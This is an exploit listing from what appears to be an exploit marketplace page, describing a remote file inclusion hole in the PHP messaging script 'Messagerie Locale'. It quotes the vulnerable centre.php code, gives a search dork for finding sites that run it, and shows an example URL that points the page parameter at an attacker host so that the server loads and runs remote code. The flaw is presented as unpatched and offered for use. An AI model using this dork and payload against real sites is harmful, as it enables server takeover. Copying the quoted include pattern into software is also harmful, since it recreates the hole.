[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Messagerie Locale (centre.php) Remote File Inclusion Vulnerability

Author
DaDIsS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1196
Category
web applications
Date add
23-11-2006
Platform
unsorted
==================================================================
Messagerie Locale (centre.php) Remote File Inclusion Vulnerability
==================================================================




#===================================================================================#
#
# Messagerie Locale => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Messagerie Locale
# Dork : inurl:indexmess.php
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in centre.php file that contain this code :
# 
# <?
#    if(isset($_GET['page']))
#   {
#        $page=$_GET['page'];
#   }
#    else
#   {
#       $page="";
#   }
#
#    if (empty($page)||!isset($page))
#   {
#         include("accueil.php");
#   }
#    else
#   {
#        include($page.".php");
#   }
#
#  ?>
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
# Proud to be a Moroccan !
#===================================================================================#




#  0day.today [2024-12-25]  #